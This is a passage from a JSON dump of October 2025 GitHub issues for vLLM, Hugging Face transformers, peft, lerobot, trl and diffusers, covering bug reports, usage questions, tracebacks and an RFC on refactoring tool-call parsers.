permitted [type=extra_forbidden, input_value=False, input_type=bool]\\n For further information visit https://errors.pydantic.dev/2.12/v/extra_forbidden', 'type': 'BadRequestError', 'param': None, 'code': 400}}`\n\nStart vLLM without the mistral tokenizer and the request succeeds.\n\nNote that this is explicitly NOT about making `strict=True` actually enforce structured outputs. The scope of this is simply to not return a validation error when this parameter is passed with any valid value when the `mistral` tokenizer is in use. The current behavior breaks some client frameworks that always pass this value, even when it has a value of `False`.\n\n### Before submitting a new issue...\n\n- [x] Make sure you already searched for relevant issues, and asked the chatbot living at the bottom right corner of the [documentation page](https://docs.vllm.ai/en/latest/), which can answer lots of frequently asked questions.", "url": "https://github.com/vllm-project/vllm/issues/27746", "state": "open", "labels": [ "bug" ], "created_at": "2025-10-29T14:33:13Z", "updated_at": "2025-10-30T19:14:50Z", "comments": 4, "user": "bbrowning" }, { "repo": "huggingface/trl", "number": 4368, "title": "GKD: multimodal inputs?", "body": "Does the Generalized Knowledge Distillation trainer (GKDTrainer) support multimodal inputs (VLMs)?\nIf yes, what's the expected dataset format? There is no example of this in the documentation.\n\nThanks!", "url": "https://github.com/huggingface/trl/issues/4368", "state": "closed", "labels": [ "\ud83d\udcda documentation", "\u2753 question", "\ud83c\udfcb GKD" ], "created_at": "2025-10-29T14:08:44Z", "updated_at": "2025-11-07T19:26:23Z", "comments": 2, "user": "e-zorzi" }, { "repo": "huggingface/lerobot", "number": 2338, "title": "policy gr00t not found when do async inference with gr00t", "body": "### System Info\n\n```Shell\nlerobot version: \n3f8c5d98 (HEAD -> main, origin/main, origin/HEAD) fix(video_key typo): fixing video_key typo in update_video_info (#2323)\n```\n\n### Information\n\n- [ ] One of the scripts in the examples/ folder of LeRobot\n- [ ] My own task or dataset (give details below)\n\n### Reproduction\n\nI have installed the following packages:\n\npip install \"torch>=2.2.1,<2.8.0\" \"torchvision>=0.21.0,<0.23.0\" # --index-url https://download.pytorch.org/whl/cu1XX\npip install ninja \"packaging>=24.2,<26.0\" # flash attention dependencies\npip install \"flash-attn>=2.5.9,<3.0.0\" --no-build-isolation\npython -c \"import flash_attn; print(f'Flash Attention {flash_attn.__version__} imported successfully')\"\n\npip install lerobot[groot]\n\nThen I ran asyn inference server:\npython -m lerobot.async_inference.policy_server \\\n --host=127.0.0.1 \\\n --port=8080\n\nwhen the async inference client send policy gr00t, the server complains no groot as below:\n\nERROR 2025-10-29 05:30:24 /_server.py:636 Exception calling application: Policy type groot not supported. Supported policies: ['act', 'smolvla', 'diffusion', 'tdmpc', 'vqbet', 'pi0', 'pi05']\n\n\nFinetuning a pi05 model is OK on the same code\nAny idea why this happens?\n\n\n\n\n\n### Expected behavior\n\nShould not complain about no groot policy\n\n", "url": "https://github.com/huggingface/lerobot/issues/2338", "state": "closed", "labels": [ "bug", "question", "policies" ], "created_at": "2025-10-29T05:36:20Z", "updated_at": "2025-11-21T15:34:21Z", "user": "jcl2023" }, { "repo": "huggingface/lerobot", "number": 2337, "title": "Can I continue reinforcement learning in HIL-SERL using a pi0", "body": "Can I continue reinforcement learning in HIL-SERL using a pi0 model from LERobot that has been fine-tuned via imitation learning?", "url": "https://github.com/huggingface/lerobot/issues/2337", "state": "open", "labels": [ "question", "policies" ], "created_at": "2025-10-29T04:30:26Z", "updated_at": "2025-11-11T03:13:23Z", "user": "pparkgyuhyeon" }, { "repo": "huggingface/peft", "number": 2878, "title": "peft \" target_modules='all-linear' \" have different behavior between x86 and aarch ?", "body": "### System Info\n\ni have tested on 2 arch (x86, arm) then find this bug.\nboth arch have peft==0.17.1\n\n### Who can help?\n\n@benjaminbossan @githubnemo\n\n### Reproduction\n\nReproduction script : bug_reprod.py\n```python\nfrom transformers import AutoModelForImageTextToText\n\nmodel = AutoModelForImageTextToText.from_pretrained(\"OpenGVLab/InternVL3_5-1B-HF\", trust_remote_code=True)\nlm_head = model.lm_head\nmodel = model.language_model\nmodel.lm_head = lm_head\n\nfrom peft import get_peft_model\nfrom peft import LoraConfig\n\npeft_config = LoraConfig(\n inference_mode=False, \n r=12,\n target_modules=\"all-linear\",\n)\nbug_model = get_peft_model(model, peft_config)\nbug_model.print_trainable_parameters()\nbreakpoint() # p bug_model, you will find lm_head have different results\n```\nput bug_reprod.py to x86 and aarch, run it you will find it have different results on lm_head!\nfollowing figure show the error :\n\n#### x86\n\"Image\"\n \n#### aarch\n\"Image\"\n\n### Expected behavior\n\n`target_module='all-linear'` should exclude lm_head in lora tuning. At least, x86, arm arch should have identical behavior.\n\n", "url": "https://github.com/huggingface/peft/issues/2878", "state": "closed", "labels": [], "created_at": "2025-10-29T03:43:02Z", "updated_at": "2025-12-07T15:03:33Z", "comments": 4, "user": "HuangChiEn" }, { "repo": "huggingface/peft", "number": 2877, "title": "peft config 'all-linear' include lm_head, is there anyway to remove it ?", "body": "I'm not sure is it a bug or my modification affect the peft ?\n> since some issue reveal that 'all-linear' will not include the lm_head\n```python\nif 'internvl' in self.variant.lower():\n if '3_5' in self.variant:\n self.model = AutoModelForImageTextToText.from_pretrained(self.variant, trust_remote_code=True)\n # internvl3.5, lm_head is not part of language_model !?\n lm_head = self.model.lm_head\n self.model = self.model.language_model\n self.model.lm_head = lm_head\n\n# then \nfrom peft import get_peft_model\nfrom peft import LoraConfig\n \nprint('Using PEFT model')\npeft_config = LoraConfig(\n inference_mode=False, \n r=self.lora_r,\n lora_alpha=self.lora_alpha,\n lora_dropout=self.lora_dropout,\n target_modules=\"all-linear\",\n)\nself.model = get_peft_model(self.model, peft_config)\n```\nif the modification do affect the peft config, is there any way to exclude the lm_head by setting LoraConfig ?\n\npeft version : 0.17.0\nCan anyone kindly give me some suggestion ? \nmany TKS ~\n\n---\n\nUpdate : \npeft have different behavior between x86 and aarch ?\n\nerror message while loading the pretrain weight : \n\"Image\"\n\n#### x86 arch, normal\n\"Image\"\n\n#### aarch, bug occurs\n\"Image\"", "url": "https://github.com/huggingface/peft/issues/2877", "state": "closed", "labels": [], "created_at": "2025-10-29T02:19:21Z", "updated_at": "2025-10-29T03:43:20Z", "comments": 1, "user": "HuangChiEn" }, { "repo": "huggingface/lerobot", "number": 2335, "title": "How to Visualize All Episodes of a LeRobot Dataset Locally?", "body": "Hi everyone, I have a question about LeRobot datasets. I'd like to inspect my data locally, but using the command\n_lerobot-dataset-viz --repo-id=${HF_USER}/record-test --episode-index=0_\nonly allows me to view one episode at a time, which is quite cumbersome.\n\nIs there a way to visualize all episodes of a dataset locally\u2014similar to [visualize dataset online](https://huggingface.co/spaces/lerobot/visualize_dataset), \nwhere I can easily browse through all episodes?\n\nThanks!", "url": "https://github.com/huggingface/lerobot/issues/2335", "state": "open", "labels": [ "question", "dataset" ], "created_at": "2025-10-29T02:01:01Z", "updated_at": "2025-12-29T12:18:57Z", "user": "Vacuame" }, { "repo": "vllm-project/vllm", "number": 27692, "title": "it run on rtx 5060 ti 16 gb", "body": "### Your current environment\n\n\nhttps://github.com/bokkob556644-coder/suc-vllm-rtx-5060-ti-16-gb/blob/main/suc_vllm.txt\n\n### How would you like to use vllm\n\n[I want to run inference of a [specific model](put link here). I don't know how to integrate it with vllm.\n](https://github.com/bokkob556644-coder/suc-vllm-rtx-5060-ti-16-gb/blob/main/suc_vllm.txt)\n\n### Before submitting a new issue...\n\n- [x] Make sure you already searched for relevant issues, and asked the chatbot living at the bottom right corner of the [documentation page](https://docs.vllm.ai/en/latest/), which can answer lots of frequently asked questions.", "url": "https://github.com/vllm-project/vllm/issues/27692", "state": "open", "labels": [ "usage" ], "created_at": "2025-10-28T21:43:00Z", "updated_at": "2025-10-28T21:43:16Z", "comments": 1, "user": "bokkob556644-coder" }, { "repo": "huggingface/transformers", "number": 41919, "title": "LFM2 image_processing_lfm2_vl_fast.py Mean Std swapped?", "body": "### System Info\n\nIn LFM2-VL image_processing_lfm2_vl_fast.py line 212 following the MEAN and STD from imagenet is used for preprocessing.\nHowever it seems like they are swapped:\n image_mean = IMAGENET_STANDARD_STD\n image_std = IMAGENET_STANDARD_MEAN\n\nor is this correct ?\n\n### Who can help?\n\n@Cyrilvallez \n\n### Information\n\n- [ ] The official example scripts\n- [ ] My own modified scripts\n\n### Tasks\n\n- [ ] An officially supported task in the `examples` folder (such as GLUE/SQuAD, ...)\n- [ ] My own task or dataset (give details below)\n\n### Reproduction\n\nHave a look at https://github.com/huggingface/transformers/blob/main/src/transformers/models/lfm2_vl/image_processing_lfm2_vl_fast.py\n\n### Expected behavior\n\nNot optimized VLM Behaviour", "url": "https://github.com/huggingface/transformers/issues/41919", "state": "closed", "labels": [ "bug" ], "created_at": "2025-10-28T16:17:44Z", "updated_at": "2025-10-31T15:02:40Z", "comments": 4, "user": "florianvoss-commit" }, { "repo": "vllm-project/vllm", "number": 27667, "title": "[Usage]: DeepseekOCR on CPU missing implementation for fused_topk", "body": "### Your current environment\n\nTry to test if it is possible to run DeepseekOCR on CPU using current git main branch.\n\nFails because there is no implementation of `fused_topk` for CPU.\n\n```\nINFO 10-28 15:41:18 [v1/worker/cpu_model_runner.py:77] Warming up model for the compilation...\nERROR: Traceback (most recent call last):\n File \"/opt/venv/lib/python3.12/site-packages/starlette/routing.py\", line 677, in lifespan\n async with self.lifespan_context(app) as maybe_state:\n ^^^^^^^^^^^^^^^^^^^^^^^^^^\n File \"/opt/venv/lib/python3.12/site-packages/starlette/routing.py\", line 566, in __aenter__\n await self._router.startup()\n File \"/opt/venv/lib/python3.12/site-packages/starlette/routing.py\", line 654, in startup\n await handler()\n File \"/app/start_server.py\", line 161, in startup_event\n initialize_model()\n File \"/app/start_server.py\", line 84, in initialize_model\n llm = LLM(\n ^^^^\n File \"/opt/venv/lib/python3.12/site-packages/vllm/entrypoints/llm.py\", line 336, in __init__\n self.llm_engine = LLMEngine.from_engine_args(\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^\n File \"/opt/venv/lib/python3.12/site-packages/vllm/v1/engine/llm_engine.py\", line 188, in from_engine_args\n return cls(\n ^^^^\n File \"/opt/venv/lib/python3.12/site-packages/vllm/v1/engine/llm_engine.py\", line 122, in __init__\n self.engine_core = EngineCoreClient.make_client(\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n File \"/opt/venv/lib/python3.12/site-packages/vllm/v1/engine/core_client.py\", line 95, in make_client\n return InprocClient(vllm_config, executor_class, log_stats)\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n File \"/opt/venv/lib/python3.12/site-packages/vllm/v1/engine/core_client.py\", line 264, in __init__\n self.engine_core = EngineCore(*args, **kwargs)\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^\n File \"/opt/venv/lib/python3.12/site-packages/vllm/v1/engine/core.py\", line 109, in __init__\n num_gpu_blocks, num_cpu_blocks, kv_cache_config = self._initialize_kv_caches(\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^\n File \"/opt/venv/lib/python3.12/site-packages/vllm/v1/engine/core.py\", line 234, in _initialize_kv_caches\n self.model_executor.initialize_from_config(kv_cache_configs)\n File \"/opt/venv/lib/python3.12/site-packages/vllm/v1/executor/abstract.py\", line 113, in initialize_from_config\n self.collective_rpc(\"compile_or_warm_up_model\")\n File \"/opt/venv/lib/python3.12/site-packages/vllm/v1/executor/uniproc_executor.py\", line 73, in collective_rpc\n return [run_method(self.driver_worker, method, args, kwargs)]\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n File \"/opt/venv/lib/python3.12/site-packages/vllm/v1/serial_utils.py\", line 459, in run_method\n return func(*args, **kwargs)\n ^^^^^^^^^^^^^^^^^^^^^\n File \"/opt/venv/lib/python3.12/site-packages/vllm/v1/worker/cpu_worker.py\", line 105, in compile_or_warm_up_model\n self.model_runner.warming_up_model()\n File \"/opt/venv/lib/python3.12/site-packages/vllm/v1/worker/cpu_model_runner.py\", line 80, in warming_up_model\n self._dummy_run(\n File \"/opt/venv/lib/python3.12/site-packages/torch/utils/_contextlib.py\", line 120, in decorate_context\n return func(*args, **kwargs)\n ^^^^^^^^^^^^^^^^^^^^^\n File \"/opt/venv/lib/python3.12/site-packages/vllm/v1/worker/gpu_model_runner.py\", line 3464, in _dummy_run\n outputs = self.model(\n ^^^^^^^^^^^\n File \"/opt/venv/lib/python3.12/site-packages/torch/nn/modules/module.py\", line 1773, in _wrapped_call_impl\n return self._call_impl(*args, **kwargs)\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n File \"/opt/venv/lib/python3.12/site-packages/torch/nn/modules/module.py\", line 1784, in _call_impl\n return forward_call(*args, **kwargs)\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n File \"/opt/venv/lib/python3.12/site-packages/vllm/model_executor/models/deepseek_ocr.py\", line 582, in forward\n hidden_states = self.language_model(\n ^^^^^^^^^^^^^^^^^^^^\n File \"/opt/venv/lib/python3.12/site-packages/torch/nn/modules/module.py\", line 1773, in _wrapped_call_impl\n return self._call_impl(*args, **kwargs)\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n File \"/opt/venv/lib/python3.12/site-packages/torch/nn/modules/module.py\", line 1784, in _call_impl\n return forward_call(*args, **kwargs)\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n File \"/opt/venv/lib/python3.12/site-packages/vllm/model_executor/models/deepseek.py\", line 495, in forward\n hidden_states = self.model(\n ^^^^^^^^^^^\n File \"/opt/venv/lib/python3.12/site-packages/torch/nn/modules/module.py\", line 1773, in _wrapped_call_impl\n return self._call_impl(*args, **kwargs)\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n File \"/opt/venv/lib/python3.12/site-packages/torch/nn/modules/module.py\", line 1784, in _call_impl\n return forward_call(*args, **kwargs)\n ", "url": "https://github.com/vllm-project/vllm/issues/27667", "state": "open", "labels": [ "usage" ], "created_at": "2025-10-28T16:14:40Z", "updated_at": "2025-10-28T16:14:40Z", "comments": 0, "user": "brainlag" }, { "repo": "vllm-project/vllm", "number": 27661, "title": "[RFC]: Consolidated tool call parser implementations by type (JSON, Python, XML, Harmony)", "body": "### Motivation.\n\nWhen someone wants to add a new tool call parser today, they typically choose an existing tool call parser that looks close to what is needed, copy it into a new file, and adjust things here and there as needed for their specific model. Sometimes tests get added, and sometimes not. Sometimes the changes to the copied parser make meaningful fixes, and sometimes the changes to the copied parser add bugs.\n\nGenerally, we have a few buckets of tool call parsers based on the format the models are trained to output - JSON, Python, XML, or Hamony style tool calls. But, we have N different implementations of streaming partial JSON parsing, N different python parsing, and so on. Instead of multiple copies of each of those, ideally we'd maintain one high quality implementation for streaming partial JSON parsing that's extensible enough to handle the needs of individual model differences.\n\n### Proposed Change.\n\nThe overall change I propose is a refactoring of the existing tool call parsers, lowering the burden to add a new tool call parser, reducing the maintenance and bug permutations possible, and providing us higher test coverage of all tool call parsers so we can systematically track and fix bugs as reported in one place.\n\nGeneral steps proposed:\n\n**Test coverage**\n\nBefore starting any refactor, the focus will be on building confidence in the existing state of all our tool call parsers by focusing on adding and extending their test suites.\n\n- [ ] Add a new common tool call parser unit test suite for all tool call parsers lacking any tests\n - #27599\n- [ ] Reorganize existing tool call parser tests to cleanly separate unit tests that just need a tokenizer from integration tests that need actual running inference servers.\n - Today we have `tests/tool_use` that is mostly integration tests, and `tests/entrypoints/openai/tool_parsers` that is mostly unit tests, but there's a mix of each in both. The plan is to move integration tests to `tests/tool_use` since that's where most of those live, and unit tests in `tests/entrypoints/openai/tool_parsers` that can all be run without an accelerator and execute quickly.\n- [ ] Review the history of each tool call parser, bugs filed against that tool call parser, and special statements in the code of each tool parser to identify special case handling. Create a test for each of these special cases.\n- [ ] Refactor existing tool call parser tests to use the common test suite for all tool call parsers while retaining any model-specific tests required by the previous review of parsers.\n- [ ] File issues of type bug for every test in the common suite that is marked as \"expected fail\" for various tool call parsers. There will be a number of these, with tool call parsers that do not meet the standards of the common suite today. These represent low-hanging fruit for us to find and fix for each parser.\n - Some fixes may be trivial, and can happen before consolidating implementations just to incrementally raise the quality of our parsers. Some fixes may not be trivial, and may only happen after consolidating implementations.\n\n**Refactoring and consolidation**\n\nAfter we have the expanded test suite, we'll have the confidence to undertake this refactor without introducing a lot of new bugs as each parser has some bespoke logic today that needs to be accounted for.\n\n- [ ] Consolidate all the partial and streaming JSON parsing logic into a central place that every JSON-style tool call parser consumes. Ensure no test regressions\n- [ ] Consolidate all the partial and streaming Python parsing logic into a central place that every Python-style tool call parser consumes.\n\n**Post-consolidation bug squashing and docs**\n\n- [ ] Remove any remaining `xfail` markers in the test suite across all tool parser test suites.\n- [ ] Update contributor docs that discuss how to add a new tool call parser, how to reuse the common logic for JSON, Python, XML, etc parsing instead of writing new, and how to use the new common test suite to simplify testing of the new parser. \n\n### Feedback Period.\n\nThis is ongoing work and feedback is accepted at any time while this issue is open. Initial stages of expanding our test coverage have already started, but there's at least a couple of weeks to provide feedback before work gets to the point of actual refactoring and consolidating of the tool call parsers.\n\n### CC List.\n\n_No response_\n\n### Any Other Things.\n\n_No response_\n\n### Before submitting a new issue...\n\n- [x] Make sure you already searched for relevant issues, and asked the chatbot living at the bottom right corner of the [documentation page](https://docs.vllm.ai/en/latest/), which can answer lots of frequently asked questions.", "url": "https://github.com/vllm-project/vllm/issues/27661", "state": "open", "labels": [ "RFC" ], "created_at": "2025-10-28T14:54:10Z", "updated_at": "2025-10-30T16:14:09Z", "comments": 2, "user": "bbrowning" }, { "repo": "huggingface/lerobot", "number": 2329, "title": "smolvla base model ( the Vlm part) to other model", "body": "Can I change smolvla base model ( the Vlm part) to other model?\nWhat should I do?\nThanks", "url": "https://github.com/huggingface/lerobot/issues/2329", "state": "closed", "labels": [ "question", "policies" ], "created_at": "2025-10-28T12:28:44Z", "updated_at": "2025-10-31T15:09:12Z", "user": "smartparrot" }, { "repo": "vllm-project/vllm", "number": 27649, "title": "[Usage]: Qwen3-32B on RTX PRO 6000 (55s First Token Delay and 15t/s)", "body": "Why does the Qwen3-32B model take 55 seconds before producing the first token, and why is the generation speed only 15t/s?\n\nMy vLLM configuration:\n\nDevice: GB202GL [RTX PRO 6000 Blackwell Server Edition]\n\nNvidia Driver Version\uff1a580.95.05\nCUDA Version\uff1a13.0\n\nDocker configuration: \n\n```sh\nPORT=8085\nMODEL_PATH=Qwen/Qwen3-32B\nSERVED_MODEL_NAME=vLLM-Qwen3-32B\n\ndocker run -d \\\n --runtime nvidia \\\n --gpus all \\\n -v /data/projects/docker/vllm/.cache/huggingface:/root/.cache/huggingface \\\n -p $PORT:8000 \\\n --env \"HUGGING_FACE_HUB_TOKEN=$HUGGING_FACE_HUB_TOKEN\" \\\n --name $SERVED_MODEL_NAME \\\n --restart unless-stopped \\\n --ipc=host \\\n vllm/vllm-openai:v0.11.0 \\\n --model /root/.cache/huggingface/$MODEL_PATH \\\n --served-model-name $SERVED_MODEL_NAME \\\n --dtype bfloat16 \\\n --gpu-memory-utilization 0.92 \\\n --max-model-len 32768 \\\n --max-num-seqs 64 \\\n --tensor-parallel-size 1 \\\n --api-key sk-vx023nmlrtTmlC\n```", "url": "https://github.com/vllm-project/vllm/issues/27649", "state": "open", "labels": [ "usage" ], "created_at": "2025-10-28T10:49:43Z", "updated_at": "2025-11-07T02:30:26Z", "comments": 4, "user": "yizhitangtongxue" }, { "repo": "vllm-project/vllm", "number": 27646, "title": "[Usage]: How to use vllm bench serve to bench remote deployed vllm models (can't bench when ep enabled!!!)", "body": "### Your current environment\n\nI deployed dpskv3 in a remote server using:\n```\nexport VLLM_USE_V1=1\nexport VLLM_ALL2ALL_BACKEND=deepep_low_latency\nvllm serve /models/hf/models--deepseek-ai--DeepSeek-V3 --tensor-parallel-size 1 --data-parallel-size 8 --enable-expert-parallel --no-enforce-eager --load-format dummy\n```\n\nAnd on another server:\n```\nVLLM_USE_V1=1 vllm bench serve --model /models/hf/models--deepseek-ai--DeepSeek-V3/ --endpoint /v1/completions --dataset-name sharegpt --dataset-path /datasets/ShareGPT/ShareGPT_V3_unfiltered_cleaned_split.json --num-prompts 10 --ready-check-timeout-sec 0 --ip 10.102.212.22 --port 8000 \n```\nwhere 10.102.212.22 is the server ip\uff0c 8000 is the default port\n\nAnd I got this below error on server:\n```\n\"POST /v1/completions HTTP/1.1\" 404 Not Found\n```\n\n\n### How would you like to use vllm\n\nI want to run inference of a deepseekv3.\n\n\n### Before submitting a new issue...\n\n- [x] Make sure you already searched for relevant issues, and asked the chatbot living at the bottom right corner of the [documentation page](https://docs.vllm.ai/en/latest/), which can answer lots of frequently asked questions.", "url": "https://github.com/vllm-project/vllm/issues/27646", "state": "open", "labels": [ "usage" ], "created_at": "2025-10-28T09:56:37Z", "updated_at": "2025-10-28T15:23:06Z", "comments": 3, "user": "Valerianding" }, { "repo": "huggingface/transformers", "number": 41910, "title": "Breaking change about AWQ Fused modules due to Attention Refactor", "body": "### System Info\n\ntransformers==5.0.0dev\nautoawq==0.2.9\nautoawq_kernels==0.0.9\ntorch==2.6.0+cu124\n\n### Who can help?\n\nDue to PR #35235, the `past_key_values` is no longer a returned value of attention modules.\n\nHowever, when using AWQ models with Fused modules [AWQ Fused modules docs](https://huggingface.co/docs/transformers/main/en/quantization/awq#fused-modules), there will be an error like issue #38554\n\n```bash\n hidden_states, _ = self.self_attn(\nValueError: too many values to unpack (expected 2)\n```\n\nSo we can hack the `awq.modules.fused.attn.QuantAttentionFused` to avoid returning `past_key_values`. Therefore, I create a primary PR #41909 to fix it.\n\nHowever, for special `rope_type` such as LLaMA3, the RoPE implementation in AutoAWQ will cause error, since `awq.modules.fused.attn.RoPE` supports default RoPE only.\n\nMaybe we can implement and maintain `AwqRoPE` and `AwqQuantAttentionFused` in `transformers.integrations.awq`? Or we can maintain `huggingface/AutoAWQ` as `casper-hansen/AutoAWQ` is archived.\n\nI'd like to refine my PR to help transformers fix this bug!\n\n@SunMarc @MekkCyber\n\n### Information\n\n- [ ] The official example scripts\n- [x] My own modified scripts\n\n### Tasks\n\n- [ ] An officially supported task in the `examples` folder (such as GLUE/SQuAD, ...)\n- [x] My own task or dataset (give details below)\n\n### Reproduction\n\n```python\n\nfrom transformers import AwqConfig, AutoModelForCausalLM, AutoTokenizer\n\n\n# model_path = \"./llama-3.1-8b-instruct-awq\"\nmodel_path = \"./qwen2.5-7b-instruct-awq\"\n# model_path = \"./qwen3-8b-awq\"\n\nawq_config = AwqConfig(\n bits=4,\n do_fuse=True,\n fuse_max_seq_len=8192\n)\n\nmodel = AutoModelForCausalLM.from_pretrained(model_path, quantization_config=awq_config).to(\"cuda:0\")\nprint(model)\ntokenizer = AutoTokenizer.from_pretrained(model_path)\n\nmax_new_tokens = 1024 if \"qwen3\" in model_path else 32\n\n\nmessages = []\n\nprompt1 = \"What is the result of 3+5?\"\nmessages.append({\"role\": \"user\", \"content\": prompt1})\ntext1 = tokenizer.apply_chat_template(messages, tokenize=False, add_generation_prompt=True)\ninputs1 = tokenizer(text1, return_tensors=\"pt\").to(\"cuda:0\")\n\ngenerated_ids1 = model.generate(**inputs1, max_new_tokens=max_new_tokens)\noutput_ids1 = generated_ids1[0, len(inputs1.input_ids[0]) :].tolist()\noutput1 = tokenizer.decode(output_ids1, skip_special_tokens=True)\nmessages.append({\"role\": \"assistant\", \"content\": output1})\nprint(\"Output 1:\", output1)\n\nprompt2 = \"What about adding 10 to that result?\"\nmessages.append({\"role\": \"user\", \"content\": prompt2})\ntext2 = tokenizer.apply_chat_template(messages, tokenize=False, add_generation_prompt=True)\ninputs2 = tokenizer(text2, return_tensors=\"pt\").to(\"cuda:0\")\n\ngenerated_ids2 = model.generate(**inputs2, max_new_tokens=max_new_tokens)\noutput_ids2 = generated_ids2[0, len(inputs2.input_ids[0]) :].tolist()\noutput2 = tokenizer.decode(output_ids2, skip_special_tokens=True)\nmessages.append({\"role\": \"assistant\", \"content\": output2})\nprint(\"Output 2:\", output2)\n\n```\n\n### Expected behavior\n\nThere is no error.", "url": "https://github.com/huggingface/transformers/issues/41910", "state": "closed", "labels": [ "bug" ], "created_at": "2025-10-28T08:29:03Z", "updated_at": "2025-11-20T13:41:34Z", "comments": 3, "user": "fanqiNO1" }, { "repo": "vllm-project/vllm", "number": 27636, "title": "[Usage]: vllm\u5982\u4f55\u4fdd\u7559qwen3-vl\u4e2d\u7684special token", "body": "### Your current environment\n\n\u6211\u5fae\u8c03\u8fc7\u7684qwen3-vl\u6a21\u578b\u7684grounding\u683c\u5f0f\u4e3a\uff1a<|object_ref_start|>\u56fe\u7247<|object_ref_end|><|box_start|>(x1,y1),(x2,y2)<|box_end|>\n\u4f7f\u7528vllm serve\u63a8\u7406\u7684\u683c\u5f0f\u662f\uff1a\u56fe\u7247(460,66),(683,252)\uff0c\u8fd9\u4e2a\u662f\u76f4\u63a5\u5ffd\u7565\u4e86special token\u4e48\uff0c\u662f\u5426\u6709\u65b9\u6cd5\u53ef\u4ee5\u4fdd\u7559\u3002\n\n### How would you like to use vllm\n\nI want to run inference of a [specific model](put link here). I don't know how to integrate it with vllm.\n\n\n### Before submitting a new issue...\n\n- [x] Make sure you already searched for relevant issues, and asked the chatbot living at the bottom right corner of the [documentation page](https://docs.vllm.ai/en/latest/), which can answer lots of frequently asked questions.", "url": "https://github.com/vllm-project/vllm/issues/27636", "state": "open", "labels": [ "usage" ], "created_at": "2025-10-28T06:52:16Z", "updated_at": "2025-10-28T06:52:16Z", "comments": 0, "user": "qfs666" }, { "repo": "huggingface/diffusers", "number": 12553, "title": "Reason to move from OpenCV to ffmpeg", "body": "I see that `diffusers.utils.export_to_video()` encourages ffmpeg usage instead of OpenCV. Can you share the reason? I'm looking for a way to add video decoding to my project so I'm collecting arguments.", "url": "https://github.com/huggingface/diffusers/issues/12553", "state": "open", "labels": [], "created_at": "2025-10-28T06:49:48Z", "updated_at": "2025-11-07T13:27:03Z", "comments": 10, "user": "Wovchena" }, { "repo": "vllm-project/vllm", "number": 27634, "title": "[Usage]: how to use --quantization option of `vllm serve`\uff1f", "body": "### Your current environment\n\n```text\n==============================\n System Info\n==============================\nOS : Ubuntu 22.04.5 LTS (x86_64)\nGCC version : (Ubuntu 11.4.0-1ubuntu1~22.04.2) 11.4.0\nClang version : Could not collect\nCMake version : Could not collect\nLibc version : glibc-2.35\n\n==============================\n PyTorch Info\n==============================\nPyTorch version : 2.8.0+cu129\nIs debug build : False\nCUDA used to build PyTorch : 12.9\nROCM used to build PyTorch : N/A\n\n==============================\n Python Environment\n==============================\nPython version : 3.10.12 (main, Aug 15 2025, 14:32:43) [GCC 11.4.0] (64-bit runtime)\nPython platform : Linux-5.15.0-160-generic-x86_64-with-glibc2.35\n\n==============================\n CUDA / GPU Info\n==============================\nIs CUDA available : True\nCUDA runtime version : 11.5.119\nCUDA_MODULE_LOADING set to : LAZY\nGPU models and configuration : GPU 0: NVIDIA GeForce RTX 4090 D\nNvidia driver version : 570.195.03\ncuDNN version : Could not collect\nHIP runtime version : N/A\nMIOpen runtime version : N/A\nIs XNNPACK available : True\n\n==============================\n CPU Info\n==============================\nArchitecture: x86_64\nCPU op-mode(s): 32-bit, 64-bit\nAddress sizes: 48 bits physical, 48 bits virtual \nByte Order: Little Endian\nCPU(s): 32\nOn-line CPU(s) list: 0-31\nVendor ID: AuthenticAMD\nModel name: AMD Ryzen 9 9950X3D 16-Core Processor\nCPU family: 26\nModel: 68\nThread(s) per core: 2\nCore(s) per socket: 16\nSocket(s): 1\nStepping: 0\nFrequency boost: enabled\nCPU max MHz: 8839.3555\nCPU min MHz: 3000.0000\nBogoMIPS: 8583.32\nFlags: fpu vme de pse tsc msr pae mce cx8\n apic sep mtrr pge mca cmov pat pse36 clflush mmx fxsr sse sse2 ht syscall \nnx mmxext fxsr_opt pdpe1gb rdtscp lm constant_tsc rep_good nopl nonstop_tsc\n cpuid extd_apicid aperfmperf rapl pni pclmulqdq monitor ssse3 fma cx16 sse\n4_1 sse4_2 movbe popcnt aes xsave avx f16c rdrand lahf_lm cmp_legacy svm ex\ntapic cr8_legacy abm sse4a misalignsse 3dnowprefetch osvw ibs skinit wdt tc\ne topoext perfctr_core perfctr_nb bpext perfctr_llc mwaitx cpb cat_l3 cdp_l\n3 hw_pstate ssbd mba ibrs ibpb stibp ibrs_enhanced vmmcall fsgsbase tsc_adj\nust bmi1 avx2 smep bmi2 erms invpcid cqm rdt_a avx512f avx512dq rdseed adx \nsmap avx512ifma clflushopt clwb avx512cd sha_ni avx512bw avx512vl xsaveopt \nxsavec xgetbv1 xsaves cqm_llc cqm_occup_llc cqm_mbm_total cqm_mbm_local avx\n_vnni avx512_bf16 clzero irperf xsaveerptr rdpru wbnoinvd cppc arat npt lbr\nv svm_lock nrip_save tsc_scale vmcb_clean flushbyasid decodeassists pausefi\nlter pfthreshold v_vmsave_vmload vgif v_spec_ctrl avx512vbmi umip pku ospke\n avx512_vbmi2 gfni vaes vpclmulqdq avx512_vnni avx512_bitalg avx512_vpopcnt\ndq rdpid bus_lock_detect movdiri movdir64b overflow_recov succor smca fsrm avx512_vp2intersect flush_l1d\nVirtualization: AMD-V\nL1d cache: 768 KiB (16 instances)\nL1i cache: 512 KiB (16 instances)\nL2 cache: 16 MiB (16 instances)\nL3 cache: 128 MiB (2 instances)\nNUMA node(s): 1\nNUMA node0 CPU(s): 0-31\nVulnerability Gather data sampling: Not affected\nVulnerability Indirect target selection: Not affected\nVulnerability Itlb multihit: Not affected\nVulnerability L1tf: Not affected\nVulnerability Mds: Not affected\nVulnerability Meltdown: Not affected\nVulnerability Mmio stale data: Not affected\nVulnerability Reg file data sampling: Not affected\nVulnerability Retbleed: Not affected\nVulnerability Spec rstack overflow: Not affected\nVulnerability Spec store bypass: Mitigation; Speculative Store Bypass disabled via prctl and 